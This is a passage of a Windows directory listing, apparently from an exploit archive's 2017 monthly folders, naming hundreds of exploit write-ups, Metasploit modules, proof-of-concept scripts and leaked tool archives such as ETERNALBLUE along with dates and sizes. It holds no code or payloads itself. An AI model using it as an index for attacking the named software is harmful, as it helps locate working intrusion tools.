joomlaeasyblog-sql.txt 03/22/2017 12:01 PM 679 joomlaextrasearch228-sql.txt 03/23/2017 02:03 PM 722 joomlafocalpoint123-sql.txt 03/03/2017 05:39 PM 860 joomlaguesser104-sql.txt 03/20/2017 03:33 AM 636 joomlajcartopencart20-sql.txt 03/20/2017 04:33 AM 630 joomlajoocart2x-sql.txt 03/23/2017 11:11 AM 759 joomlamodernbooking10-sql.txt 03/03/2017 05:40 PM 795 joomlarecipemanager22-sql.txt 03/14/2017 04:13 PM 2,228 joomlaregpro-sql.txt 03/14/2017 09:22 AM 821 joomlasimplemembership333-sql.txt 03/14/2017 04:13 PM 2,164 joomlasngevents15-sql.txt 03/03/2017 05:39 PM 787 joomlastreetguessrgame10-sql.txt 03/15/2017 11:11 AM 764 joomlavikappointments15-sql.txt 03/15/2017 10:11 AM 746 joomlavikrentcar111-sql.txt 03/15/2017 10:33 AM 756 joomlavikrentitems13-sql.txt 03/26/2017 05:44 AM 661 justanothervideo143-sql.txt 03/10/2017 12:11 PM 1,872 kinseyinforlawson-sql.txt 03/12/2017 01:50 AM 8,663 KL-001-2017-004.txt 03/07/2017 01:02 AM 1,307 laravel-xss.txt 03/29/2017 01:02 PM 940 linux316028-overflow.txt 03/30/2017 02:13 PM 1,359 linuxkernel-sigio.txt 03/09/2017 05:40 PM 1,382 livebox3-dos.txt 03/23/2017 05:28 PM 2,387 logsign_exec.rb.txt 03/31/2017 09:02 PM 2,397 mapr-disclose.txt 03/06/2017 07:22 AM 1,572 matrimonial30-sql.txt 03/09/2017 05:44 AM 586 mediasearchengine-sql.txt 03/17/2017 12:11 PM 2,653 membership-simplified-for-oap-members-only-exploit.py.txt 03/31/2017 04:33 AM 733 membershipformulatebms-sql.txt 03/01/2017 02:02 PM 713 mememakerscript21-sql.txt 03/18/2017 04:33 AM 2,101 metinfo5315-xss.txt 03/17/2017 12:40 AM 5,567 MICROSOFT-DVD-MAKER-XML-EXTERNAL-ENTITY-FILE-DISCLOSURE.txt 03/24/2017 04:04 PM 1,807 MielePG8528-traversal.txt 03/05/2017 02:11 AM 9,534 mikrotik625-dos.txt 03/28/2017 04:02 AM 2,919 mikrotik6385-dos.txt 03/07/2017 04:22 PM 517 minicmsname11-sql.txt 03/11/2017 01:00 AM 550 mirage-sql.txt 03/06/2017 05:22 AM 1,121 mlmbinaryplan205-sql.txt 03/06/2017 06:02 AM 1,333 mlmforcedmatrix207-sql.txt 03/06/2017 05:44 AM 1,353 mlmforexmarketplan201-sql.txt 03/06/2017 05:02 AM 1,350 mlmmembershipplan205-sql.txt 03/12/2017 01:48 AM 2,972 MOBAXTERM-TFTP-PATH-TRAVERSAL-REMOTE-FILE-ACCESS.txt 03/14/2017 03:44 PM 6,870 msedge-arbitraryheaders.txt 03/16/2017 04:33 AM 2,648 msiis-xss.txt 03/27/2017 04:20 PM 6,112 msiis6-overflow.txt 03/23/2017 03:22 AM 1,236 mss1-sql.txt 03/29/2017 06:32 PM 3,294 msvba-module.txt 03/15/2017 09:22 PM 941 mswindowsloaduvstable-overflow.txt 03/06/2017 05:44 AM 740 multireligionrm471-sql.txt 03/26/2017 10:22 AM 8,042 mvs2015update3-dos.txt 03/06/2017 08:22 AM 601 naukriclone302-sql.txt 03/27/2017 05:22 PM 626 netcomm-xss.txt 03/03/2017 05:37 PM 1,506 netgainem72562-exec.txt 03/12/2017 01:54 AM 3,040 netgear_r7000_cgibin_exec.rb.txt 03/24/2017 01:26 AM 10,326 netgear_wnr2000_rce.rb.txt 03/06/2017 05:20 AM 1,241 networkcomm302-sql.txt 03/09/2017 03:22 PM 587 nlancefms22-sql.txt 03/24/2017 04:00 PM 7,292 nuxeo-shell.txt 03/17/2017 01:06 AM 2,811 OLSA-2015-8255.txt 03/17/2017 01:08 AM 3,848 OLSA-2015-8256.txt 03/17/2017 01:04 AM 7,384 OLSA-2015-8258.txt 03/20/2017 04:33 AM 871 omegleclone-sql.txt 03/23/2017 04:33 AM 1,131 omegleclone20-sql.txt 03/23/2017 08:22 AM 3,187 onarcade24x-lfd.txt 03/06/2017 08:01 AM 1,142 onlinecinemaebs201-sql.txt 03/06/2017 05:54 PM 3,236 openelec701603-exec.txt 03/29/2017 04:33 AM 755 opensourceclassifiedsad-sql.txt 03/01/2017 05:44 AM 3,852 osticket1912-xss.txt 03/28/2017 06:22 AM 2,095 outlook-dos.tgz 03/26/2017 11:44 AM 587 parceldelivery10-sql.txt 03/11/2017 01:22 AM 633 petlisting30-sql.txt 03/27/2017 07:22 PM 3,927 pfsense232-exec.txt 03/27/2017 03:44 PM 1,814 pfsense232-xsrf.txt 03/27/2017 02:22 PM 2,795 pfsense232-xss.txt 03/03/2017 05:43 PM 13,007 pfsense232-xssxsrf.txt 03/06/2017 04:22 AM 1,323 phpb2b305-sql.txt 03/02/2017 01:33 AM 871 phpclassifiedolxclone-sql.txt 03/06/2017 05:02 AM 1,368 phpclassifiedsrental360-sql.txt 03/09/2017 04:32 AM 1,702 phpentrepreneur12-sql.txt 03/12/2017 02:11 AM 622 phpforums30-sql.txt 03/17/2017 08:22 PM 8,112 phplist326-sql.txt 03/17/2017 07:32 PM 3,867 phplist326-xss.txt 03/26/2017 05:44 AM 570 phprealestateproperty-sql.txt 03/29/2017 11:22 PM 1,720 pixiecms104-xss.txt 03/26/2017 04:33 AM 588 professionalbus-sql.txt 03/11/2017 05:44 AM 690 propertylisting31-sql.txt 03/23/2017 05:19 PM 7,648 qnapqts-escalate.txt 03/01/2017 01:22 PM 978 ragefaces13-sql.txt 03/15/2017 07:22 PM 1,326 readymadejobsite301-sql.txt 03/06/2017 05:01 AM 566 redbusclone305-sql.txt 03/06/2017 03:01 AM 1,161 responsiveeventsmovieticket-sql.txt 03/06/2017 06:55 AM 1,438 responsivematrimonial401-sql.txt 03/15/2017 12:11 PM 25,644 rewolf-pcausa-exploit.zip 03/07/2017 01:11 PM 1,410 S2-45-poc.py.txt 03/01/2017 02:33 PM 8,390 SA-20170301-0.txt 03/07/2017 06:00 PM 7,968 SA-20170307-0.txt 03/09/2017 06:03 PM 10,441 SA-20170308-0.txt 03/22/2017 03:08 PM 11,424 SA-20170322-0.txt 03/01/2017 03:22 AM 745 schooldir-sql.txt 03/06/2017 03:03 AM 1,180 schoolsalertmgmt201-sql.txt 03/20/2017 02:11 AM 541 securedownloadlinks-sql.txt 03/06/2017 05:05 AM 756 selectyourcollege201-sql.txt 03/10/2017 03:33 PM 7,596 sicunet-execdisclose.txt 03/06/2017 02:11 AM 1,058 singlethreaterbooking-sql.txt 03/16/2017 12:55 AM 2,482 sitecoreep81-xss.txt 03/16/2017 12:43 AM 1,295 skype7160102-dllhijack.txt 03/06/2017 02:11 AM 719 socialnetwork301-sql.txt 03/24/2017 06:22 AM 515 sparrow-traversal.txt 03/23/2017 11:11 AM 972 spycamlizard1230-overflow.txt 03/16/2017 12:54 AM 1,679 steamprofilein2011-sql.txt 03/14/2017 05:44 PM 6,146 struntsrce.py.txt 03/15/2017 12:57 AM 11,754 struts2_content_type_ognl.rb.txt 03/29/2017 02:22 PM 3,652 syncbreeze9516-overflow.txt 03/29/2017 02:22 PM 1,474 syncbreezeenterprise9516-overflow.txt 03/01/2017 02:01 PM 2,449 synchronetbbs316c-dos.txt 03/01/2017 02:22 PM 2,625 sysgauge1518-overflow.txt 03/22/2017 03:17 PM 2,277 sysgauge_client_bof.rb.txt 03/09/2017 05:11 AM 494 themeforestclone-sql.txt 03/26/2017 07:22 AM 591 tourpackagebooking10-sql.txt 03/09/2017 06:32 AM 533 trademartb2bts11-sql.txt 03/27/2017 03:22 PM 2,645 transcend-xsrf.txt 03/05/2017 04:33 AM 2,770 travelportal937-sql.txt 03/12/2017 02:32 AM 700 traveltours20-sql.txt 03/09/2017 05:42 PM 8,387 usbpcap-escalate.txt 03/16/2017 12:47 AM 4,063 usbpratirodh-xxe.txt 03/11/2017 01:34 AM 549 vanelo-sql.txt 03/01/2017 03:44 PM 15,518 veritasnb-dosexectraversal.txt 03/09/2017 03:32 AM 495 videohiveclone-sql.txt 03/28/2017 06:23 AM 1,645 vxsearchenterprise9512-overflow.txt 03/07/2017 12:11 PM 5,064 wdmycloud-exec.txt 03/07/2017 10:32 AM 11,831 wdmycloud-inject.txt 03/01/2017 03:44 PM 1,524 wepresent-backdoor.txt 03/24/2017 09:22 AM 7,805 wifirxpower-overflow.txt 03/03/2017 03:22 AM 656 wp-enumerate.txt 03/07/2017 01:02 AM 3,268 wp453ap-xss.txt 03/01/2017 05:02 AM 2,898 wpacl2452-xss.txt 03/03/2017 01:02 AM 2,849 wpadminer144-exposure.txt 03/09/2017 04:55 PM 620 wpappthaslidergallery10-download.txt 03/09/2017 04:55 PM 804 wpappthaslidergallery10-sql.txt 03/03/2017 03:26 AM 3,546 wpaptfi1277-xss.txt 03/03/2017 03:20 AM 4,260 wpatahualpa-xsrf.txt 03/03/2017 03:22 AM 5,617 wpatahualpa-xss.txt 03/03/2017 03:41 AM 3,592 wpcfm-xsrfxss.txt 03/03/2017 03:44 AM 3,974 wpcontactform400-xss.txt 03/03/2017 03:17 AM 3,735 wpdownloadmanager2899-xsrf.txt 03/01/2017 05:44 AM 2,952 wpfdm344-xss.txt 03/03/2017 03:06 AM 3,187 wpfilemanager301-xsrf.txt 03/03/2017 03:25 AM 3,251 wpgad211-xss.txt 03/03/2017 03:08 AM 3,249 wpglobalcontentblocks215-xsrf.txt 03/03/2017 03:19 AM 3,339 wpgwolleguestbook174-xsrf.txt 03/03/2017 03:10 AM 3,853 wpgwolleguestbook174-xss.txt 03/09/2017 03:44 PM 589 wpmacphotogallery30-download.txt 03/03/2017 03:23 AM 3,478 wpmagicfields1171-xss.txt 03/03/2017 05:47 PM 2,845 wpman30-shell.txt 03/16/2017 01:09 AM 2,295 wpmembershipsimplified158-disclose.txt 03/03/2017 03:14 AM 3,856 wpnewstatpress124-xss.txt 03/03/2017 03:34 AM 14,650 wppbs176-xsrf.txt 03/09/2017 05:49 PM 780 wppicaphotogallery10-sql.txt 03/07/2017 01:22 AM 3,871 wppress-dos.txt 03/03/2017 03:12 AM 2,614 wpsimpleadsmanager298125-inject.txt 03/01/2017 07:22 AM 5,366 wptrustform20-xss.txt 03/03/2017 03:15 AM 2,862 wptsg163-xss.txt 03/03/2017 03:39 AM 8,239 wpuserloginlog-xss.txt 03/03/2017 03:29 AM 6,483 wpvaultpress184-exec.txt 03/01/2017 04:33 AM 3,411 wpwpspamfreeas2114-xss.txt 03/10/2017 01:39 AM 2,332 wtserver1702-dllhijack.txt 03/01/2017 02:11 AM 9,412 X41-2017-001.txt 03/11/2017 04:33 AM 739 yachtlisting20-sql.txt 03/11/2017 03:01 AM 596 yellowpages32-sql.txt 03/06/2017 08:22 AM 860 yellowpagesclone134-sql.txt 03/17/2017 06:22 PM 3,196 zen_app_mobile_wp_rfu.py.txt 03/26/2017 08:22 PM 6,227 ZSL-2017-5399.txt 303 File(s) 10,545,538 bytes Directory of \2017-exploits\1704-exploits 05/01/2017 05:27 PM <DIR> . 05/01/2017 05:27 PM <DIR> .. 05/01/2017 05:23 PM 512,903,496 1704-exploits.tgz 04/07/2017 05:44 AM 3,223 1password-dllhijack.txt 04/03/2017 04:33 AM 16,085 20170403-Chimein.mozilla.org_SXSS-RXSS-HRS.txt 04/04/2017 05:22 PM 1,767 acoracms7006-redirectxss.txt 04/13/2017 03:26 AM 5,085 ADOBE-CREATIVE-CLOUD-PRIVILEGE-ESCALATION.txt 04/11/2017 03:03 PM 9,028 adobe-inject.txt 04/26/2017 01:27 AM 14,320,548 adventures_in_automotive_networks_and_control_units.tgz 04/05/2017 06:22 AM 559 airbnbcrashpadderclone-sql.txt 04/04/2017 08:32 PM 1,356 airwatchldap-inject.txt 04/27/2017 08:32 PM 6,554 alertonwebtalk-execxsrfdisclose.txt 04/14/2017 03:25 AM 2,417 alienvaultossimusm5-exec.rb.txt 04/04/2017 02:32 AM 1,841 apachetomcat6789-disclose.txt 04/01/2017 05:02 AM 23,070 aufs-escalate.txt 04/04/2017 07:32 PM 1,936 avayaradvisionscopia-sql.txt 04/09/2017 12:21 PM 8,529 backboxos-dos.txt 04/03/2017 04:33 AM 5,132 bluecoatasg-escalate.rb.txt 04/12/2017 10:32 AM 6,090 brotherdevices-bypass.txt 04/04/2017 07:09 PM 2,141 caapilayer7-traversal.txt 04/06/2017 08:22 PM 3,188 cambiumsnmp-bypass.txt 04/13/2017 03:16 AM 3,528 ciscocatalyst2960-exec.txt 04/14/2017 12:02 AM 3,015 ciscocatalyst2960rocem-exec.txt 04/11/2017 02:02 PM 826 classifiedportalsoftware51-sql.txt 04/10/2017 02:33 PM 260,609 codeigniter-inject.pdf 04/14/2017 03:31 AM 4,044 CONCRETE5-v8.1.0-HOST-HEADER-INJECTION.txt 04/14/2017 03:02 AM 3,311 copperminegallery1544-traversal.txt 04/03/2017 07:32 PM 8,195 CSNC-2017-003.txt 04/28/2017 12:02 AM 3,095 CSNC-2017-004.txt 04/17/2017 03:44 PM 331,586 CVE-2017-0199.pdf 04/19/2017 02:33 PM 17,254 cve-2017-0199_toolkit.py.txt 04/03/2017 07:32 PM 1,674 CVE-2017-5672_KonyLabs.txt 04/20/2017 12:35 AM 5,991 CVE-2017-7220.txt 04/25/2017 03:14 PM 7,012 CVE-2017-7221.py.txt 04/10/2017 02:02 PM 404,788 DC-2017-01-014.pdf 04/20/2017 12:38 AM 391,604 DC-2017-01-027.pdf 04/13/2017 03:07 AM 694,782 DC-2017-02-014_50_WordPress_plugins_by_BestWebSoft_Advisory.pdf 04/06/2017 06:55 PM 865,820 DC-2017-03-001.pdf 04/21/2017 05:18 PM 535,964 DC-2017-03-005-WPAPSIP.pdf 04/13/2017 03:10 AM 399,512 DC-2017-04-003_Magento_Arbitrary_File_Upload.pdf 04/25/2017 03:19 PM 5,934 dellcc13280-escalate.txt 04/03/2017 06:32 PM 4,808 dellomsa-traversal.txt 04/24/2017 08:19 PM 2,667 disksorter_bof.rb.txt 04/05/2017 05:02 AM 2,948 dlinkdir615hw-xsrf.txt 04/07/2017 08:22 PM 1,014 dlinkdwr116-traversal.txt 04/05/2017 02:11 AM 770 doctorsappointment-sql.txt 04/07/2017 11:11 AM 1,475 e107214-xsrf.txt 04/15/2017 02:42 AM 29,615 EASYBEE-1.0.1.tgz 03/12/2017 08:19 PM 1,452 easymovconverter1424-overflow.txt 04/15/2017 02:44 AM 11,706 EASYPI-3.1.0.tgz 04/21/2017 04:48 PM 1,243 ebayapcs642-sql.txt 04/15/2017 02:44 AM 25,028 ECLIPSEDWING-1.5.2.tgz 04/15/2017 02:45 AM 13,229 EDUCATEDSCHOLAR-1.0.0.tgz 04/27/2017 12:11 PM 462 efu-shell.txt 04/15/2017 02:47 AM 15,809 EMERALDTHREAD-3.0.0.tgz 04/15/2017 02:49 AM 20,162 EMPHASISMINE-3.4.0.tgz 04/15/2017 01:46 AM 499,368,706 EquationGroupLeak-20170414.zip 04/20/2017 04:43 PM 4,836 ERPSCAN-17-020.txt 04/20/2017 04:46 PM 6,293 ERPSCAN-17-021.txt 04/20/2017 04:48 PM 5,058 ERPSCAN-17-022.txt 04/15/2017 02:50 AM 15,308 ERRATICGOPHER-1.0.1.tgz 04/15/2017 02:51 AM 14,485 ESKIMOROLL-1.1.1.tgz 04/15/2017 02:53 AM 39,050 ESTEEMAUDIT-2.1.0.tgz 04/15/2017 03:25 AM 73,927 ETERNALBLUE-2.2.0.tgz 04/15/2017 02:53 AM 39,889 ETERNALROMANCE-1.3.0.tgz 04/15/2017 02:55 AM 25,796 ETERNALROMANCE-1.4.0.tgz 04/15/2017 02:56 AM 109,320 ETERNALSYNERGY-1.0.1.tgz 04/15/2017 02:57 AM 16,701 EWOKFRENZY-2.0.0.tgz 04/15/2017 02:58 AM 22,130 EXPLODINGCAN-2.0.2.tgz 04/21/2017 05:04 PM 3,132 exponentcms241-sql.txt 04/11/2017 11:11 AM 515 faqscript313-sql.txt 04/05/2017 05:02 AM 3,177 faveohdcom193-xsrf.txt 04/26/2017 03:04 AM 1,134 flyspray10rc4-xss.txt 04/08/2017 12:22 PM 5,636 foscam-hardcodedprivatekeys.txt 04/03/2017 06:22 AM 634 geomoose-traversal.txt 04/24/2017 10:22 AM 1,047 gnomekeyring-disclose.txt 04/14/2017 03:23 AM 3,433 gns3macsxlpe-exec.txt 04/10/2017 12:26 AM 3,229 GS20170409232650.tgz 04/10/2017 12:28 AM 4,801 GS20170409232805.tgz 04/10/2017 12:29 AM 3,573 GS20170409232911.tgz 04/10/2017 12:30 AM 1,411 GS20170409233004.txt 04/10/2017 12:33 AM 2,451 GS20170409233320.tgz 04/10/2017 12:34 AM 2,064 GS20170409233358.txt 04/10/2017 12:37 AM 2,723 GS20170409233722.txt 04/10/2017 12:38 AM 1,798 GS20170409233819.tgz 04/10/2017 12:40 AM 1,235 GS20170409234021.tgz 04/10/2017 12:41 AM 2,506 GS20170409234113.txt 04/10/2017 12:42 AM 34,469 GS20170409234206.txt 04/10/2017 12:43 AM 21,550 GS20170409234325.txt 04/10/2017 12:44 AM 1,279 GS20170409234440.txt 04/10/2017 12:45 AM 19,474 GS20170409234544.txt 04/10/2017 12:47 AM 25,366 GS20170409234653.txt 04/10/2017 12:48 AM 21,641 GS20170409234759.txt 04/10/2017 12:49 AM 19,391 GS20170409234905.txt 04/10/2017 12:50 AM 26,501 GS20170409235003.txt 04/10/2017 12:51 AM 14,214 GS20170409235110.txt 04/10/2017 12:52 AM 1,400 GS20170409235223.tgz 04/10/2017 12:54 AM 24,789 GS20170409235414.txt 04/10/2017 12:55 AM 1,612 GS20170409235541.tgz 04/10/2017 12:57 AM 1,970 GS20170409235741.tgz 04/10/2017 01:00 AM 26,021 GS20170410000004.txt 04/10/2017 01:01 AM 1,742 GS20170410000149.tgz 04/10/2017 01:04 AM 2,340 GS20170410000401.txt 04/10/2017 01:05 AM 1,680 GS20170410000504.tgz 04/10/2017 01:06 AM 1,861 GS20170410000608.tgz 04/10/2017 01:07 AM 1,616 GS20170410000704.tgz 04/10/2017 01:08 AM 3,718 GS20170410000828.tgz 04/10/2017 01:09 AM 5,422 GS20170410000921.tgz 04/13/2017 03:29 AM 2,122 GS20170413022815.txt 04/14/2017 03:35 AM 5,931 GS20170414023504.tgz 04/14/2017 03:36 AM 3,319 GS20170414023655.tgz 04/18/2017 06:32 PM 3,019 GS20170419003354.tgz 04/18/2017 06:32 PM 2,847 GS20170419003623.tgz 04/18/2017 06:20 PM 1,687 GS20170419003836.tgz 04/19/2017 01:40 AM 2,998 GS20170419004054.tgz 04/19/2017 01:41 AM 2,542 GS20170419004154.tgz 04/19/2017 01:47 AM 2,192 GS20170419004740.tgz 04/19/2017 01:49 AM 1,196 GS20170419004846.txt 04/19/2017 01:51 AM 3,093 GS20170419005125.txt 04/20/2017 03:27 AM 3,167 GS20170420022753.tgz 04/21/2017 12:37 AM 1,784 GS20170420233757.tgz 04/21/2017 05:23 PM 3,946 GS20170421162301.tgz 04/27/2017 04:50 PM 4,137 GS20170427154951.txt 04/05/2017 04:32 AM 10,275 helpdezk111-xsrfexec.txt 04/12/2017 03:44 PM 30,092 hgw345-exec.txt 04/29/2017 07:32 PM 3,297 hidemyasspro2x-escalate.txt 04/30/2017 07:32 PM 2,736 hidemyasspro3x-escalate.txt 04/07/2017 02:33 PM 3,131 http-asuswrt-session-hijacking.nse 04/07/2017 06:32 PM 3,248 http-asuswrt-xss.nse 04/07/2017 02:33 PM 3,318 http-vuln-cve2015-1579.nse 04/08/2017 02:33 PM 3,494 http-vuln-cve2017-6527.nse 04/17/2017 04:43 PM 17,695 huawei_hg532n_cmdinject.rb.txt 04/08/2017 02:33 PM 9,886 iis-buffer-overflow.nse 04/05/2017 04:22 AM 764 imageprolazygirls-sql.txt 04/04/2017 06:22 PM 1,316 inchoofbconnect-xss.txt 04/06/2017 01:33 PM 1,146 iplatinumioneview-xss.txt 04/29/2017 03:22 AM 876 irfanview444-dos.txt 04/10/2017 11:11 AM 732 jobscript4web45-sql.txt 04/26/2017 04:47 PM 1,206 joomlajdbexport3210-xssdisclose.txt 04/02/2017 11:32 AM 684 joomlajobgrok-sql.txt 04/26/2017 03:13 AM 719 joomlamyportfolio302-sql.txt 04/04/2017 02:02 PM 2,103 kaseyavsa6500-xss.txt 04/04/2017 06:32 PM 1,197 kaseyavsa9020004-disclose.txt 04/25/2017 12:39 AM 4,762 KL-001-2017-005.txt 04/25/2017 12:41 AM 5,137 KL-001-2017-006.txt 04/25/2017 12:44 AM 12,168 KL-001-2017-007.txt 04/25/2017 12:46 AM 7,777 KL-001-2017-008.txt 04/25/2017 12:48 AM 6,256 KL-001-2017-009.txt 04/04/2017 07:32 PM 1,566 lanterncms-sqlxss.txt 04/26/2017 04:52 PM 14,453 lightdm-escalate.txt 04/01/2017 04:11 AM 2,956 linux2632-escalate.txt 04/04/2017 06:22 AM 546 maiangreetings21-sql.txt 04/04/2017 10:22 AM 529 maiansurvey11-sql.txt 04/04/2017 04:32 AM 709 maianuploader40-sql.txt 04/04/2017 06:32 PM 2,738 manhattantrimble-xxe.txt 04/16/2017 10:03 PM 4,324 MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt 04/26/2017 05:18 PM 3,746 mercurial_ssh_exec.rb.txt 04/06/2017 01:01 PM 1,878 moodle27-disclose.txt 04/10/2017 04:55 PM 4,301 MOXA-MX-AOPC-SERVER-v1.5-XML-EXTERNAL-ENTITY.txt 04/10/2017 02:43 PM 2,382 MOXA-MXVIEW-v2.8-DENIAL-OF-SERVICE.txt 04/10/2017 03:33 AM 3,922 MOXA-MXVIEW-v2.8-REMOTE-PRIVATE-KEY-DISCLOSURE.txt 04/26/2017 03:19 AM 4,748 ms2k3sp2gopher-exec.txt 04/11/2017 01:22 PM 3,059 msofficeonenote2007-dllhijack.txt 04/20/2017 04:42 PM 1,411 mswindowsifeo-backdoor.txt 04/18/2017 12:55 AM 4,657 mswinsmb-exec.rb.txt 04/11/2017 10:36 PM 861 mybb1810-traversal.txt 04/11/2017 10:35 PM 617 mybb1810-xss.txt 04/07/2017 05:44 AM 1,087 mydbr-redirect.txt 04/04/2017 08:39 PM 9,866 ntfs3g_priv_esc.rb.txt 04/01/2017 05:22 AM 11,047 ntp-escalate.txt 04/20/2017 04:34 PM 13,882 octobercms10412-exec.txt 04/25/2017 12:56 AM 7,197 office_word_hta.rb.txt 04/21/2017 06:55 AM 4,172 oraclejava-dllhijack.txt 04/06/2017 07:23 AM 1,582 OSS-2017-02.txt 04/25/2017 11:11 AM 1,599 oxatis2017-xss.txt 04/29/2017 04:33 AM 2,444 pandacloud-dos.txt 04/13/2017 02:01 AM 1,997 pcman_acct.rb.txt 04/13/2017 02:02 AM 2,037 pcman_get.rb.txt 04/13/2017 02:04 AM 1,990 pcman_mkd.rb.txt 04/13/2017 02:03 AM 1,992 pcman_nlst.rb.txt 04/02/2017 05:44 AM 4,212 pixie104-shell.txt 04/14/2017 03:17 AM 1,602 ponyos40-kernel.txt 04/05/2017 05:02 AM 893 premiumpennyauction-sql.txt 04/26/2017 02:01 AM 722 privatetunnelclient28-overflow.txt 04/13/2017 02:43 AM 1,699 proxifier218-escalate.txt 04/12/2017 11:11 AM 3,044 proxifier219-escalate.txt 04/06/2017 07:11 PM 6,256 qnapqts-exec.txt 04/11/2017 03:44 PM 4,181 questprivilegemanager600-filewrite.txt 04/26/2017 04:51 PM 2,134 reviveadserver401-xsrfxss.txt 04/11/2017 10:34 PM 708 s9yserendipity-xsrf.txt 04/03/2017 06:32 PM 4,730 SA-20170403-0.txt 04/07/2017 03:44 PM 4,767 SA-20170407-0.txt 04/26/2017 03:15 AM 10,785 SA-20170425-0.txt 04/15/2017 01:45 AM 4,403 scriptler-xss.txt 04/14/2017 03:00 AM 3,334 sedsystemsd3decimator-disclose.txt 04/06/2017 07:32 PM 3,668 sennetdatalogger-exec.txt 04/20/2017 12:31 AM 15,360 SGMA17-001.txt 04/06/2017 07:32 PM 1,617 sielco-dllhijack.txt 04/04/2017 07:32 PM 1,040 silverstripe319-disclose.txt 04/27/2017 02:02 PM 3,062 simplefileuploader-download.txt 04/04/2017 07:32 PM 1,797 smartjobboard509-xssdisclose.txt 04/11/2017 02:22 PM 718 socialdirectoryscript20-sql.txt 04/13/2017 03:14 AM 2,111 solarisextremeparr-escalate.txt 04/04/2017 08:39 PM 5,316 solarwinds_lem_exec.rb.txt 04/06/2017 12:22 AM 3,155 SPICEWORKS-IMPROPER-ACCESS-CONTROL-FILE-OVERWRITE.txt 04/01/2017 07:11 PM 3,969 SPLUNK-ENTERPRISE-INFORMATION-THEFT.txt 04/23/2017 06:02 PM 16,293 squirrelmail1422-exec.txt 04/05/2017 04:04 AM 695 sweepstakespro-sql.txt 04/29/2017 07:02 PM 5,776 syntaxhighlightmediawiki-inject.txt 04/11/2017 10:48 PM 6,775 SYSS-2015-035.txt 04/11/2017 10:51 PM 5,705 SYSS-2015-036.txt 04/14/2017 03:20 AM 4,712 SYSS-2017-005.txt 04/14/2017 03:13 AM 4,392 SYSS-2017-006.txt 04/14/2017 03:27 AM 4,548 SYSS-2017-007.txt 04/14/2017 03:22 AM 6,071 SYSS-2017-008.txt 04/14/2017 03:29 AM 5,119 SYSS-2017-009.txt 04/18/2017 05:45 PM 3,480 taskschd-escalate.txt 04/20/2017 03:21 AM 4,665 tmtda261062rl-bypass.txt 04/20/2017 12:42 AM 2,927 tmtda261062rl-exec.txt 04/20/2017 03:14 AM 2,535 tmtda261062rlast-exec.txt 04/20/2017 03:16 AM 2,536 tmtda261062rlastc-exec.txt 04/20/2017 03:13 AM 2,562 tmtda261062rldpf-exec.txt 04/20/2017 03:19 AM 2,378 tmtda261062rldpu-disclose.txt 04/20/2017 03:11 AM 8,959 tmtda261062rldpu-exec.txt 04/20/2017 03:10 AM 2,828 tmtda261062rlhu-exec.txt 04/20/2017 03:09 AM 2,480 tmtda261062rlllqd-exec.txt 04/20/2017 03:17 AM 3,275 tmtda261062rllo-traversal.txt 04/20/2017 03:05 AM 2,518 tmtda261062rllq-exec.txt 04/20/2017 03:07 AM 2,487 tmtda261062rllqp-exec.txt 04/20/2017 03:03 AM 2,442 tmtda261062rllqs-exec.txt 04/16/2017 05:44 AM 1,739 tova8-escalate.txt 04/19/2017 01:44 AM 8,580 trendmicro_threat_discovery_admin_sys_time_cmdi.rb.txt 04/29/2017 07:02 PM 2,541 tuleap969986-exec.txt 04/04/2017 06:32 PM 1,418 tweekdm-sql.txt 04/27/2017 11:11 AM 2,664 typo3news-sql.txt 04/02/2017 12:22 AM 8,359 ubuntuptchown-escalate.txt 04/12/2017 09:21 PM 4,379 uc-httpd-directory-traversal.txt 04/17/2017 03:22 AM 1,918 viruschaser8-overflow.txt 04/18/2017 03:44 PM 8,234 vlc_exploit.py.txt 04/17/2017 04:49 PM 5,683 watchguardfbxtm-xxeinject.txt 04/22/2017 11:22 PM 3,820 wdmycloud221126-bypass.txt 04/14/2017 03:22 AM 1,129 wds21-sqlxss.txt 04/17/2017 05:44 AM 10,594 winscp594-dos.rb.txt 04/24/2017 05:03 PM 2,027 wipg1000_cmd_injection.rb.txt 04/19/2017 03:44 PM 6,677 WLB-2017040113.txt 04/08/2017 01:13 PM 3,308 wordpress-spider-blindsqli.txt 04/17/2017 11:22 AM 2,398 wordrtf-exec.tgz 04/26/2017 04:49 PM 1,807 wpcarrentalsystem25-sql.txt 04/21/2017 12:41 AM 3,068 wpconninfo-xsrf.txt 04/07/2017 06:32 PM 1,086 wpcopysafeweb-xsrf.txt 04/06/2017 07:22 PM 2,028 wpfirewall2-xssxsrf.txt 04/26/2017 04:49 PM 1,676 wpkittycatfish22-sql.txt 04/07/2017 11:11 AM 1,027 wpwhizz-xsrf.txt 04/26/2017 04:47 PM 2,410 wpwowforms21-sql.txt 04/26/2017 04:48 PM 1,626 wpwowviralsignups21-sql.txt 04/15/2017 02:58 AM 5,556 ZIPPYBEER-1.0.2.tgz 04/30/2017 07:32 PM 2,286 ZSL-2017-5400.txt 04/30/2017 09:32 PM 5,258 ZSL-2017-5401.txt 04/30/2017 10:11 PM 1,300 ZSL-2017-5402.txt 05/01/2017 12:02 AM 4,629 ZSL-2017-5403.txt 04/02/2017 04:22 AM 1,771 zyxelemg-exec.txt 259 File(s) 1,032,057,758 bytes Directory of \2017-exploits\1705-exploits 06/01/2017 12:57 AM <DIR> . 06/01/2017 12:57 AM <DIR> .. 06/01/2017 12:55 AM 35,832,549 1705-exploits.tgz 05/15/2017 07:22 PM 2,099 admidio328-xsrf.txt 05/24/2017 03:00 AM 669 alexguestbook504-xss.txt 05/30/2017 12:44 AM 3,506 AMPACHE-v3.8.2-XSS.txt 05/18/2017 03:01 AM 6,129,772 apple-dos.tgz 05/22/2017 03:02 AM 7,737 asteriskcseq-overflow.txt 05/22/2017 04:02 AM 3,541 asteriskskinny-dos.txt 05/10/2017 11:22 PM 8,839 asusrt-xsrfdisclose.txt 05/04/2017 02:14 PM 2,029 atlassian-sourcetree-2.5-url-handler.txt 05/11/2017 03:14 AM 1,911 banmanager158-execxss.txt 05/19/2017 05:22 AM 9,400 beldengc-overflowdisclose.txt 05/17/2017 05:55 AM 3,221 builderengine_upload_exec.rb.txt 05/20/2017 12:11 PM 1,017 caseaware-xss.txt 05/19/2017 09:22 PM 1,466 ceragonfibeair-backdoor.txt 05/15/2017 03:22 AM 2,113 cerberusftp-overflow.rb.txt 05/12/2017 11:11 AM 1,012 cmsms216-xssexec.txt 05/02/2017 01:34 PM 7,910 CMSMS_babel_redirect.txt 05/02/2017 10:10 AM 4,967 concrete5_csrf_dos.txt 05/11/2017 12:23 AM 8,005 CORE-2017-0001.txt 